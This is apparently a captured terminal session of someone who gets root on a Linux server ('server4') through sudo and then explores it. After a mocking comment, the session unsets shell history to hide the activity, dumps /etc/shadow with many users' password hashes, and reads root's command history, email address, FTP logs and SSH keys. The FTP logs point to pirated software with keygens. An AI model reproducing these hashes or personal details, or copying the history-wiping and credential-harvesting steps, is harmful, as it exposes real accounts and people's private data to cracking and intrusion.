-rw------- 1 djdd djdd 819 2007-06-08 17:55 .bash_history
-rw-r--r-- 1 djdd djdd 567 2007-02-01 04:24 .bash_profile
-rw-r--r-- 1 djdd djdd 1.8K 2007-02-01 04:24 .bashrc
-rw-r--r-- 1 djdd djdd 375 2007-02-01 04:24 .cshrc
drwx------ 2 djdd djdd 4.0K 2007-02-01 04:28 .ssh
djdd@server4:~$ cat .bash_history
w
who
ssh 66.168.220.yes
ssh 66.168.220.212:443
ssh 66.168.220.212 443
ssh 443 66.168.220.212
man ssh
ssh -D 443 66.168.220.212
sudo ssh -D 443 66.168.220.212
sudo ssh -D 443 66.168.220.212
ssh 66.168.220.212
w
exit
ping www.thednscentre.com
exit
exit
irssi
ssh craplandia.org
ssh craplandia.org
ssh craplandia.org
ssh craplandia.org
screen -raAd
exit
passwd
screen irssi
ssh zloche.net
ssh zloche.net
exit
ssh zloche.net
exit
ssh zloche.net
ssh zloche.net
w
who
ssh zloche.net
exit
cat /etc/motd
uname -a
sudo id
w
who
w
who
users
ls -alh
cd .ssh
ls
cat known_hosts
ssh djdd@66.168.220.212
who
who
w
users
ps aux
kill -9 7018
ps -aux
ps aux
last -n 10
ls
ls -alh
cat .bash_history
ssh zloche.net
ssh zloche.net
ssh zloche.net
ssh zloche.net
ssh zloche.net
ssh zloche.net
ssh craplandia.org
ssh craplandia.org
exit
djdd@server4:~$ cd .ssh
djdd@server4:~/.ssh$ ls -alh
total 12K
drwx------ 2 djdd djdd 4.0K 2007-02-01 04:28 .
drwxr-xr-x 3 djdd djdd 4.0K 2007-02-01 04:28 ..
-rw-r--r-- 1 djdd djdd 1.1K 2007-05-10 22:52 known_hosts
djdd@server4:~/.ssh$ cat known_hosts
66.168.220.212 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtmDaXUYBfpbI9nF
khEnqjRxLMWLxfkDdxeKDMs5orhRjRa8GQ1AC3KpC7y+TaonfUM/dSXR0+1K1BJUtT
AWxe5ZeCDKL4phDbubxDIJvFKcTfNi+bjiwkHlz1OKDThvqtRt781wcJRnSbnXinhZ
k8Ia3v6AIHsoB5x/yljSwznrSDWuVwn5LSkNtISOiOX91ItfxwKi8B0ZgSBdUkmAHq
Myej98cRVvY/iATI5SrFRCfWNkC7gH/oFxXM/bKB94H7TZ4W6wtfdjmkBrYxojDbUK
KEfd1LywcJCTYxab8usl+Q39uYvqTfXwJDIYX+BE810BNmXi0QA6WlYUOpMJj9Q==
craplandia.org,74.69.17.126 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA5v
HP/DNtJSXwf+2YNhLD9MX2HkcuNqhGNtmJ6/sis9MTAQTEqnTi0Nw4yaoQL0qFM7nZ
kS8OGQI0X55c0Ud0JEXjbXuikZEFUtzr2A+up19wewbpMsMRac87r+vtU218ozOUjY
uurhJwF58DhrUKLrTwa5hl8pRFTifSqhrhKCMBdQreHkmR8GoHIohMdkaPyIACKBgA
aUDFX4VHoYW7AbJlO/3cJLxWEHoUkRM9aHi6tfqXt69e8W1LGXCEI83xUyjOT+ndCm
3x+w/Scuw7kBrjSYg0CXaxDTR5l8lBMJAdenr9CFWPMKbeOLrvdAlpPewJ5EKRSxY4
sWZqZwaqWQ==
zloche.net,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgp
Hj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB
1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTM
ziRUom2qChYoVBFLimYvH+b3fclaQaSichE=
djdd@server4:~$ w
00:52:32 up 35 days, 22:54, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
djdd@server4:~$ who
djdd pts/0 Jun 10 00:50 (c-76-108-85-21.hsd1.fl.comcast.net)
djdd@server4:~$ who -a
May 5 01:58 2198 id=si term=0 exit=0
system boot May 5 01:58
run-level 2 May 5 01:58 last=S
May 5 01:59 8763 id=l2 term=0 exit=0
LOGIN tty1 May 5 01:59 14410 id=1
LOGIN tty2 May 5 01:59 22055 id=2
LOGIN tty3 May 5 01:59 15373 id=3
LOGIN tty4 May 5 01:59 13138 id=4
LOGIN tty5 May 5 01:59 28322 id=5
LOGIN tty6 May 5 01:59 27969 id=6
LOGIN ttyS0 May 5 01:59 8347 id=T0
djdd + pts/0 Jun 10 00:50 . 27808 (c-76-108-85-21.hsd1.fl.comcast.net)
pts/1 Jun 8 16:54 11261 id=ts/1 term=0 exit=0
pts/2 May 17 19:01 12001 id=ts/2 term=0 exit=0
pts/3 May 10 22:51 15317 id=/3 term=0 exit=0
pts/3 Jun 8 16:53 20448 id=ts/3 term=0 exit=0
pts/5 Jun 1 05:44 24188 id=ts/5 term=0 exit=0
pts/6 Jun 8 16:54 21971 id=ts/6 term=0 exit=0
pts/7 Jun 7 18:53 20846 id=ts/7 term=0 exit=0
pts/8 Jun 7 18:59 29897 id=ts/8 term=0 exit=0
djdd@server4:~$ id
uid=1005(djdd) gid=1005(djdd) groups=1005(djdd)
djdd@server4:~$ sudo id
Password:
uid=0(root) gid=0(root) groups=0(root)
djdd@server4:~$ # AHAHAHAHAHA
djdd@server4:~$ sudo su -l
su: invalid option -- l
Usage: su [OPTS] [-] [username [ARGS]]
- make this a login shell
-c, --command=<command>
pass command to the invoked shell using its -c
option
-m, -p, --preserve-environment
do not reset environment variables, and keep the
same shell
-s, --shell=<shell>
use shell instead of the default in /etc/passwd
djdd@server4:~$ sudo su -
server4:~# unset HISTFILE ; unset SAVEHIST
server4:~# w
00:54:14 up 35 days, 22:56, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
djdd pts/0 c-76-108-85-21.h 00:50 0.00s 0.04s 0.00s sshd: djdd [pri
server4:~# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 1492 504 ? S May05 0:34 init [2]
root 2 0.0 0.0 0 0 ? S May05 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SN May05 0:07 [ksoftirqd_CPU0]
root 4 0.0 0.0 0 0 ? S May05 0:08 [kswapd]
root 5 0.0 0.0 0 0 ? S May05 0:00 [bdflush]
root 6 0.0 0.0 0 0 ? S May05 0:12 [kupdated]
root 7 0.0 0.0 0 0 ? S< May05 0:00 [mdrecoveryd]
root 8 0.0 0.0 0 0 ? S May05 0:23 [kjournald]
root 13233 0.0 0.0 0 0 ? S May05 0:20 [kjournald]
root 29859 0.0 0.3 2244 788 ? Ss May05 0:43 /sbin/syslogd
root 14962 0.0 0.1 1492 464 ? Ss May05 0:00 /sbin/klogd
root 28307 0.0 17.2 44216 42648 ? Ss May05 10:45 /usr/sbin/named
root 2236 0.0 0.5 2500 1248 ? S May05 0:00 /bin/sh /usr/bin/
mysql 4526 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld
root 2914 0.0 0.1 1476 484 ? S May05 0:00 logger -p daemon.
mysql 11911 0.0 7.0 77744 17464 ? S May05 0:34 /usr/sbin/mysqld
mysql 11464 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld
mysql 5970 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld
mysql 26606 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld
mysql 15247 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld
mysql 3096 0.0 7.0 77744 17464 ? S May05 12:59 /usr/sbin/mysqld
mysql 18129 0.0 7.0 77744 17464 ? S May05 7:06 /usr/sbin/mysqld
mysql 9691 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld
mysql 19984 0.0 7.0 77744 17464 ? S May05 0:00 /usr/sbin/mysqld
mysql 12133 0.0 7.0 77744 17464 ? S May05 0:01 /usr/sbin/mysqld
mysql 9802 0.0 7.0 77744 17464 ? S May05 0:02 /usr/sbin/mysqld
root 19289 0.0 0.2 2220 728 ? Ss May05 0:14 /usr/sbin/inetd
root 11711 0.0 0.6 3720 1544 ? Ss May05 0:05 /usr/sbin/sshd
root 7545 0.0 0.3 1756 808 ? Ss May05 0:05 /usr/sbin/cron
root 4927 0.0 2.1 10628 5368 ? Ss May05 0:54 /usr/bin/perl /us
root 22753 0.0 2.6 16620 6608 ? S May05 1:14 /usr/sbin/apache
root 19067 0.0 2.2 8732 5456 ? S May05 28:38 python /usr/bin/d
root 14410 0.0 0.1 1484 472 tty1 Ss+ May05 0:00 /sbin/getty 38400
root 22055 0.0 0.1 1484 472 tty2 Ss+ May05 0:00 /sbin/getty 38400
root 15373 0.0 0.1 1484 472 tty3 Ss+ May05 0:00 /sbin/getty 38400
root 13138 0.0 0.1 1484 472 tty4 Ss+ May05 0:00 /sbin/getty 38400
root 28322 0.0 0.1 1484 472 tty5 Ss+ May05 0:00 /sbin/getty 38400
root 27969 0.0 0.1 1484 472 tty6 Ss+ May05 0:00 /sbin/getty 38400
root 8347 0.0 0.1 1484 476 ttyS0 Ss+ May05 0:00 /sbin/getty -L tt
gumbie 13651 0.0 0.7 3660 1880 ? Ss May17 0:01 SCREEN -e^Tt
gumbie 6449 0.0 0.6 3228 1720 pts/2 Ss+ May17 0:00 /bin/bash
gumbie 23097 0.0 0.6 3212 1664 pts/4 Ss May20 0:00 /bin/bash
root 16342 0.0 0.6 2652 1572 pts/4 S May27 0:00 -su
root 11 0.0 0.2 2052 592 pts/4 T Jun01 0:18 tail -F /var/log/
gumbie 15453 0.0 0.6 3212 1664 pts/5 Ss Jun03 0:00 /bin/bash
root 13262 0.0 0.6 2604 1488 pts/5 S Jun03 0:00 -su
prototy 601 0.0 0.6 2584 1500 pts/5 S+ Jun03 0:00 -su
www-data 25611 0.0 2.9 16876 7396 ? S Jun08 0:00 /usr/sbin/apache
www-data 11373 0.0 3.0 16912 7536 ? S Jun08 0:00 /usr/sbin/apache
www-data 16966 0.0 3.0 16908 7436 ? S Jun08 0:00 /usr/sbin/apache
stax 26322 2.9 2.2 15220 5632 ? S Jun08 56:00 php msnbot.php
ircd 25089 0.0 0.6 2612 1500 pts/4 S+ Jun09 0:00 -su
www-data 17076 0.0 2.9 16864 7276 ? S Jun09 0:00 /usr/sbin/apache
www-data 23265 0.0 2.7 16752 6688 ? S Jun09 0:00 /usr/sbin/apache
www-data 12134 0.0 2.9 16864 7280 ? S Jun09 0:00 /usr/sbin/apache
www-data 2976 0.0 2.7 16752 6688 ? S Jun09 0:00 /usr/sbin/apache
www-data 1545 0.0 2.9 16864 7288 ? S Jun09 0:00 /usr/sbin/apache
www-data 22567 0.0 2.7 16752 6768 ? S Jun09 0:00 /usr/sbin/apache
www-data 32028 0.0 2.8 16760 7004 ? S Jun09 0:00 /usr/sbin/apache
root 27808 0.0 0.8 7176 2172 ? Ss 00:50 0:00 sshd: djdd [priv]
root 20818 0.0 0.8 7176 2172 ? S 00:50 0:00 sshd: djdd [priv]
djdd 4329 0.0 0.9 7184 2240 ? S 00:50 0:00 sshd: djdd@pts/0
djdd 22316 0.0 0.6 3180 1668 pts/0 Ss 00:50 0:00 -bash
root 9556 0.0 0.5 2584 1472 pts/0 S 00:53 0:00 -su
root 25811 0.0 0.3 2480 852 pts/0 R+ 00:54 0:00 ps aux
server4:~# netstat -anvp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5666 0.0.0.0:* LISTEN 19289/inetd
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 22753/apache
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 4927/perl
tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN 19289/inetd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 19289/inetd
tcp 0 0 213.251.160.26:53 0.0.0.0:* LISTEN 28307/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 28307/named
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 11711/sshd
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 11711/sshd
tcp 0 0 213.251.160.26:36826 207.46.107.79:1863 ESTABLISHED26322/php
tcp 0 0 213.251.160.26:58125 207.46.26.197:1863 ESTABLISHED26322/php
tcp 0 0 213.251.160.26:56634 207.46.27.67:1863 ESTABLISHED26322/php
tcp 0 288 213.251.160.26:22 76.108.85.21:1688 ESTABLISHED27808/sshd: djdd [p
tcp 0 0 213.251.160.26:56485 207.46.26.142:1863 ESTABLISHED26322/php
udp 0 0 0.0.0.0:32768 0.0.0.0:* 28307/named
udp 0 0 0.0.0.0:10000 0.0.0.0:* 4927/perl
udp 0 0 213.251.160.26:53 0.0.0.0:* 28307/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 28307/named
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] STREAM LISTENING 282 28307/named /var/run/ndc
unix 8 [ ] DGRAM 238 29859/syslogd /dev/log
unix 2 [ ACC ] STREAM LISTENING 351 4526/mysqld /var/run/mysqld/mysqld.sock
unix 2 [ ] DGRAM 15312755 4329/0
unix 3 [ ] STREAM CONNECTED 15312754 27808/sshd: djdd [p
unix 3 [ ] STREAM CONNECTED 15312753 4329/0
unix 2 [ ] DGRAM 1098 4927/perl
unix 2 [ ] DGRAM 999 4927/perl
unix 2 [ ] DGRAM 349 2914/logger
unix 2 [ ] DGRAM 280 28307/named
unix 2 [ ] DGRAM 271 14962/klogd
netstat: no support for `AF IPX' on this system.
netstat: no support for `AF AX25' on this system.
netstat: no support for `AF X25' on this system.
netstat: no support for `AF NETROM' on this system.
server4:~# cat /etc/shadow
root:$1$Ycnj762I$8EX7DzphtLPPEnh7AA1FN1:13541:0:99999:7:::
daemon:*:12529:0:99999:7:::
bin:*:12529:0:99999:7:::
sys:*:12529:0:99999:7:::
sync:*:12529:0:99999:7:::
games:*:12529:0:99999:7:::
man:*:12529:0:99999:7:::
lp:*:12529:0:99999:7:::
mail:*:12529:0:99999:7:::
news:*:12529:0:99999:7:::
uucp:*:12529:0:99999:7:::
proxy:*:12529:0:99999:7:::
postgres:*:12529:0:99999:7:::
www-data:*:12529:0:99999:7:::
backup:*:12529:0:99999:7:::
operator:*:12529:0:99999:7:::
list:*:12529:0:99999:7:::
irc:*:12529:0:99999:7:::
gnats:*:12529:0:99999:7:::
nobody:*:12529:0:99999:7:::
identd:!:12529:0:99999:7:::
sshd:!:12529:0:99999:7:::
stax:$1$Rj0PaaoN$vt..3umW5auOBtwu0yDT10:13647:0:99999:7:::
gumbie:$1$ImYTO/K/$2D1HVxm7iSSap/oReQ6aw0:13596:0:99999:7:::
mysql:!:13541:0:99999:7:::
hlds:$1$SwHx08vh$AMVPLX4zHY8LfqrFXRO/e/:13581:0:99999:7:::
www:$1$RWNlTHOr$4w.MlTSdRd2ouG4Iw7AHy0:13558:0:99999:7:::
xposedbones:$1$nVhIWkli$NtGy8.YOTF5JkaEtpcmZA1:13602:0:99999:7:::
djdd:$1$9/zyY8fR$GeOd4OQ3bR/zacmTSO/eI.:13643:0:99999:7:::
ircd:$1$AlG2jcBf$v9PXz1QSwmz9tFE4s9apl/:13547:0:99999:7:::
nagios:$1$PQHBNCj/$wzFXTDJeluPLGzkWs03zI.:13551:0:99999:7:::
yumiro:$1$Gwmo8wbf$MuiHL3C4dqnbOSMraCEaH0:13557:0:99999:7:::
misterinfo:$1$wKm3cgNu$kGovmOlqFq3nudFEUaIBO.:13560:0:99999:7:::
chat:$1$kkneKyBR$chmW4CO.RNtpIOx4Cnjmy.:13600:0:99999:7:::
madstorm:$1$5.2bzoRU$vfaoUUJEGCqvXAJEk2a7o/:13604:0:99999:7:::
poe:$1$TQV5Sytj$uIDY8mXNj5HRJi1/XuXA10:13606:0:99999:7:::
gnomex:$1$w40//R6K$J9MbUU6Mr4rHQbM.YlbTk.:13616:0:99999:7:::
prototype:$1$nL.Omo1M$uXS9IlD5giKHkgjnrrWOa1:13618:0:99999:7:::
server4:~# cd ~root
server4:~# ls -alh
total 168K
drwx------ 14 root root 4.0K Jun 1 06:58 .
drwxr-xr-x 21 root root 4.0K Feb 13 02:25 ..
-rw------- 1 root root 7.6K May 27 19:18 .bash_history
-rw-r--r-- 1 root root 393 Nov 22 2004 .bashrc
drwx------ 2 root root 4.0K Feb 5 23:23 .elinks
drwxr-xr-x 3 root root 4.0K Jan 28 17:49 .emacs.d
-rw-r--r-- 1 root root 29 Jan 28 14:21 .email
drwx------ 2 root root 4.0K Feb 12 01:09 .gconf
drwx------ 2 root root 4.0K Feb 12 01:10 .gconfd
drwx------ 2 root root 4.0K Feb 12 01:09 .gnome
drwx------ 3 root root 4.0K Feb 12 01:09 .gnome2
drwx------ 2 root root 4.0K Feb 12 01:09 .gnome2_private
-rw-r--r-- 1 root root 5 Jan 28 14:21 .mdg
-rw------- 1 root root 159 May 20 09:01 .nano_history
drwxr-xr-x 2 root root 4.0K Mar 27 19:05 .ncftp
-r-------- 1 root root 9 Jan 28 14:21 .p
-rw-r--r-- 1 root root 202 Nov 22 2004 .profile
drwx------ 2 root root 4.0K Feb 13 02:41 .ssh
drwxr-x--- 2 root root 4.0K Jan 28 21:12 .steam
-rw------- 1 root root 5.6K Feb 3 16:24 .viminfo
-rw-r--r-- 1 root root 8 Feb 21 2005 .vimrc
drwxr-xr-x 4 root root 4.0K Feb 3 23:49 New
-rw-r--r-- 1 root root 40K Jan 28 14:21 install_rtm.sh
-rw-r--r-- 1 root root 1.4K Jun 13 2005 installer_la_cle-with-check.sh
-rw-r--r-- 1 root root 21K Jan 28 23:54 meh.txt
drwxr-xr-x 2 root root 4.0K Jun 1 06:23 snort
server4:~# cat .bash_history
w
df -h
apt-get
apt-get install *sudo*
apt-get install sudo*
apt-get update
apt-get install sudo*
cd /etc/
emacs
yum install emacs*
apt-get install emacs*
apt-get install *emacs*
w
apt-get install emac*
apt-get upd
apt-get install pico*
vi
vi /etc/apt/sources.list
apt-get update
apt-get update
apt-get update
apt-get install emacs*
apt-get install emac*
apt-get install emac*
apt-get
apt-get check
apt-get autoclean
apt-get
apt-get update
apt-get emacs
apt-get install emacs
w
cd /
wget http://www.zloche.net/sources.list
cd /etc/apt/
ls
mv sources.list sources.list__BACKUP
mv /sources.list ./
ls
apt-get update
apt-get update
apt-get install emacs*
apt-get install emacs
apt-get install emacs21*
apt-get install emacs21
emacs
cd/
cd /
cd /home/
ls
adduser
cd /etc/sudoers
emacs /etc/sudoers
adduser
hostname
hostname
apt-get install apache
apt-get install phpmyadmin
w
top
top
ls
pwd
top > meh.txt
less meh.txt
/etc/init.d/bind
/etc/init.d/bind stop
/etc/init.d/mysql status
/etc/init.d/mysql restart
top
top
w
top
top
w
top
cd /home/hlds/
ls
cd ts
cd addons/
cd amxmodx
cd configs/
emacs plugins.ini
w
emacs plugins.ini
w
chmod 777 -R ./
w
chmod 666 /dev/ptmx
chmod 666 /dev/null
ls -l /dev/null
less .bash_history
w
dmesg
man hlds
man -k
man hlds_run
ls ~hlds
top
tail -f /var/log/debug
tail -f /var/log/daemon.log
tail -f /var/log/kern.log
top
cd New/openssl-0.9.8d
ls
make
make install
cd ../new
w
ssh server1.zloche.net
ssh zloche.zapto.org
cd /etc/
ls
cd ssh/
ls
less
less sshd_config
less sshd_config
emacs ssh_config
emacs sshd_config
/etc/init.d/webmin
/etc/init.d/webmin start
apt-get install webmin
locate webmin
cd ~stax/
finger gumbie
ls
wget http://prdownloads.sourceforge.net/webadmin/webmin_1.320_all.deb
ls
dpkg webmin_1.320_all.deb
dpkg --help
dpkg -i webmin_1.320_all.deb
locate webmin
cd /etc/webmin/
ls
emacs miniserv.conf
emacs miniserv.users
link
links
w
w
top
ssh stax@zloche.zapto.or
ssh stax@zloche.zapto.org
top
free -m
ssh stax@www.zloche.net
top
su hlds
w
w
free
cd /usr/src/linux
ssh stax@www.zloche.net
cat /proc/version
su stax
adduser ircd
ls ~ircd
adduser nagios
pico /etc/passwd
mv /home/nagios/ /usr/local
uname -a
df
ls ~nagios
su - nagios
su - ircd
pico /etc/hosts.deny
pico /etc/hosts.deny
tail -f /var/log/denyhosts
fg
id
cd /etc/bind
ls
ls -l
ls
pico named.conf
pico named.conf.local
man bind
man named.conf
ls
mkdir slave
pico named.conf.local
host server3.zloche.net
host irc.zloche.net
pico named.conf.local
pwd
ls slave
ls -l
rndc reload
/etc/init.d/bind reload
ps aux | grep named
/etc/init.d/bind stop
/etc/init.d/bind start
ps aux | grep named
ls slave
ls slave/rmachine.net.hosts
less slave/rmachine.net.hosts
ping server4
ping server3
dig rmachine.net ns
less named.conf
less named.conf.local
DD
ssh gumbie@server4
tail -F /var/log/messages
tail -F /var/log/messages /var/log/auth.log
fg
mkdir New
cd New
elinks www.google.com
ls
fg
ls
tar -xzf openssl-0.9.8d.tar.gz
cd openssl-0.9.8d
./configure
ls
./Configure
./config
make
make install
cd ..
ls -l
pico /etc/services
ls /etc/inetd.conf
pico /etc/inetd.conf
which tcpd
pico /etc/inetd.conf
cp ~nagios/bin/nrpe /usr/sbin
ls -l /usr/sbin/nrpe
ps auxww | grep inetd
/etc/init.d/inetd reload
fg
fg
ls /var/log
ls ~nagios/var
ls ~nagios
ls ~nagios/bin
./nrpe -h
pico /etc/inetd.conf
/etc/init.d/inetd reload
fg
fg
pico /etc/resolv.conf
fg
ls
ldconfig
elinks www.openssl.org
tar -xzf openssl-0.9.8d.tar.gz
cd oepn
cd openssl-0.9.8d
./configure
./config
make
ls /usr/local/ssl/lib
make install
ls /usr/local/ssl/lib
less /usr/local/ssl/lib/pkgconfig/libssl.pc
less /usr/local/ssl/lib/pkgconfig/*
pico /etc/ld.so.conf
ldconfig
ls
find . -name "libssl*"
less FAQ
less PROBLEMS
./configure --help | grep shared
./config --help | grep shared
./config shared
make
.
ls /usr/local/ssl
ls /usr/local/ssl/lib
ls /usr/local/ssl/lib
ldconfig
apt-get install make
apt-get install gcc
apt-get install ssl
apt-get install openssl
apt-get install openssl-dev
apt-get install openssl-devel
apt-cache search openssl|less
apt-get install libssl0.9.7
apt-get install ping
apt-get install iputils-ping
ping -h
cd ..
cd
fg
locate denyhosts
apt-cache search denyhosts
cd New
mv ~gumbie/DenyHosts-2.6.tar.gz .
tar -xzf DenyHosts-2.6.tar.gz
ls
cd DenyHosts-2.6
ls
less README.txt
python setup.py install
apt-get install python
python
apt-cache search python | grep 2.3
apt-cache search python | grep 2.3 | grep lib
less README.txt
ls
python setup.py install
ls /usr/lib/python2.3
apt-cache search python | grep 2.3 | grep lib| less
apt-get install python2.3-dev
python setup.py install
ls /usr/share/denyhosts/
ln -s /usr/share/denyhosts /etc
cd /etc/denyhosts
cp denyhosts.cfg-dist denyhosts.cfg
pico denyhosts.cfg
less /var/log/messages
less /var/log/auth.log
pico denyhosts.cfg
less /var/log/auth.log
pico denyhosts.cfg
ls
pico daemon-control-dist
cp daemon-control-dist daemon-control
pico dam
pico daemon-control
pico daemon-control
cp -P daemon-control /etc/init.d/
cd /etc/rc3
cd /etc/rc3.d/
ls
ls -l
ln -s ../init.d/daemon-control S99
rm S99
mv ../init.d/daemon-control ../init.d/denyhosts
ln -s ../init.d/denyhosts S99denyhosts
cd ../rc4.d
ls
ln -s ../init.d/denyhosts S99denyhosts
cd ../rc5.d
ls -l
ln -s ../init.d/denyhosts S99denyhosts
cd ../rc6.d
ls
ln -s ../init.d/denyhosts K21denyhosts
cd ../rc0.d/
ln -s ../init.d/denyhosts K21denyhosts
ls -l
cd ../rc1.d/
ls
ln -s ../init.d/denyhosts K21denyhosts
cd ../rc2.d/
ls
ln -s ../init.d/denyhosts K21denyhosts
ps aux | grep init
ls
rm K21
rm K21denyhosts
ln -s ../init.d/denyhosts S99denyhosts
ls ../rc1.d/
cd
fg
/etc/init.d/denyhosts start
fg
fg
tail -F /var/log/messages /var/log/auth.log /var/log/kern.log
free
ls /etc/security/
ls /etc/security/time.conf
less /etc/security/time.conf
grep kill *
less install_rtm.sh
grep kill *
less install_rtm.sh
crontab -l
ls /etc/crontab
less /etc/crontab
man rtm
pico /etc/crontab
/etc/init.d/cron restart
fg
ls
tail -F /var/log/messages /var/log/auth.log /var/log/kern.log
cat /etc/crontab
id
cd ~nagios
ls
ls bin
ls etc
mkdir -p tmp/etc
cp etc/nsca.cfg tmp/etc
cp etc/ndo2db.cfg tmp/etc
cp etc/ndomod.cfg tmp/etc
cd tmp
ls ../bin
ls ../libexec
ls ..
ls
ls ../etc
ls ../etc/nrpe.cfg etc
cp ../etc/nrpe.cfg etc
ls -l
chown -R nagios.nagios *
ls -l
tar -czf NagiosAgent_nrpe.tgz *
tar -tzf NagiosAgent_nrpe.tgz
mv NagiosAgent_nrpe.tgz ..
cd ..
chown -R nagios.nagios NagiosAgent_nrpe.tgz
rmdir tmp
ls tmp
rm -rf tmp
ls
ls ndoutils-1.4b2/
ls ndoutils-1.4b2/src/
ls -l
passwd nagios
fg
ls
mv NagiosAgent_nrpe.tgz ~gumbie
chown gumbie ~gumbie/NagiosAgent_nrpe.tgz
fg
fg
pico /etc/denyhosts/data/allow-hosts
pico /etc/denyhosts/denyhosts.cfg
mv /etc/denyhosts/data/allow-hosts /etc/denyhosts/data/allowed-hosts
ls /etc/denyhosts/data/
ls ~gumbie
fg
pico .bash_history
grep vfr .bash_history
cd /var/bin
cd /etc/bind
ls
cat named.conf.local
ls -l slave/
fg
dd
apt-cache search ncftp
apt-get install ncftp2
ncftp server3
ncftp -u server3
ncftp -u server3
ls
ls Xlinx/
ls
mv Xlinx/ ~gumbie
chown gumbie ~gumbie/Xlinx/
chown -R gumbie ~gumbie/Xlinx/
ls /etc/init.d/squid status
ls /etc/init.d/squid start
ls /etc/init.d/squid
/etc/init.d/squid start
ps auxww | grep squid
pico /etc/squid/squid.conf
/etc/init.d/squid stop
id
cd /etc/bind
ls
cd slave/
ls
less zloche.net.hosts
dig zloche.net ns
whois zloche.net | less
dig zloche.net soa
cd ..
ls
less named.conf
less named.conf.options
less named.conf.local
ls /home
cd /usr/local/nagios/
ls
tar -czf copyOfInstall.tgz *
scp copyOfInstall.tgz nagios@irc.liveits.com:.
pico ~/.ssh/known_hosts
scp copyOfInstall.tgz nagios@irc.liveits.com:.
ls
rm copyOfInstall.tgz
crontab -l
crontab nagios -l
crontab -l nagios
crontab -u nagios -l
server4:~# cat .email
leclairalexandre@hotmail.com
server4:~# cat .nano_history
nasgios
nagios
lock
LOCK
_LOCK
lock_
run
allow-hosts
allow
207
207.
65.95
65.94
65.9
bas2
.pid
pid
denyhosts.lock
denyhosts_lock
acl
mynet
ournet
my
password
server4:~# cd ../.ncftp
server4:~/.ncftp# ls -alh
total 24K
drwxr-xr-x 2 root root 4.0K Mar 27 19:05 .
drwx------ 14 root root 4.0K Jun 1 06:58 ..
-rw------- 1 root root 145 Mar 27 19:05 bookmarks
-rw-r--r-- 1 root root 59 Mar 27 19:05 history
-rw-r--r-- 1 root root 697 Mar 27 19:03 log
-rw-r--r-- 1 root root 312 Mar 27 19:05 prefs
server4:~/.ncftp# cat *
NcFTP bookmark-file version: 7
Number of entries: 1
server3,server3,gumbie,,,/home/gumbie,I,,46094ed6,1,1,0,1,80.248.208.223,,213494,61224,2,0,S
quit
ls
ls
pwd
cd ~gumbie
ls
get -R Electronics_Apps/
quit
server3 at Tue Mar 27 18:52:26 2007
server3 at Tue Mar 27 18:52:47 2007
get 43.66 MB
ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xilinx.ChipScope.Pro.v8.2.03i.Incl.Keymaker-ZWT.rar
get 45.51 MB
ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xilinx.ChipScope.Pro.v8.2.03i.Linux.Incl.Keymaker-ZWT.rar
get 56.73 MB
ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xilinx.PlanAhead.v8.2.3-ZWT.rar
get 62.33 MB
ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xilinx.PlanAhead.v8.2.3.Linux-ZWT.rar
get 256.00 kB
ftp://server3/home/gumbie/Electronics_Apps/Xlinx/Xten.Networks.X-Pro.v2.2.2.ALL.PPC.Retail-DVTPDA/Xten.Networks.X-Pro.v2.2.2.ALL.PPC.Retail-DVTPDA/d-000xt.rar
anonopen 1
anonpass gumbie@server4.zloche.net
blank-lines 1
ftp-mode 0
logsize 10240
maxbookmarks 0
pager /bin/more
progress-meter 2
remote-msgs 0
startup-lcwd
startup-msgs 3
timeout 600
trace 0
utime 1
visual 1
show-trailing-space 0
total-runs 3
total-xfer-hundredths-of-seconds 61224
total-xfer-kbytes 213494
server4:~/.ncftp# cd ../.ssh
server4:~/.ssh# ls -alh
total 24K
drwx------ 2 root root 4.0K Feb 13 02:41 .
drwx------ 14 root root 4.0K Jun 1 06:58 ..
-rw------- 1 root root 509 Feb 21 2005 authorized_keys2
-rw-r--r-- 1 root root 4.4K May 27 13:27 known_hosts
-rw-r--r-- 1 root root 3.0K Feb 9 02:48 known_hosts~
server4:~/.ssh# cat *
from="213.186.50.100" ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAt3XaIhEoRK5sEKm6wtYyazLOx3w+Yv9+bpfEvLftH
r2hxZ2TY2A655iwMbgvhHqsMuGEjK9yGkZIQbUgB6HvOgOWOwJSX6Gc9Ac7GuH11xSU8t
HDuTQot6fVtgcm2Y/VUFi65Knz9rLHz7h/Zy29ek+UYav5T7juhBIuk57cDxs=
root@cache.ovh.net
from="::ffff:213.186.50.100" ssh-rsa
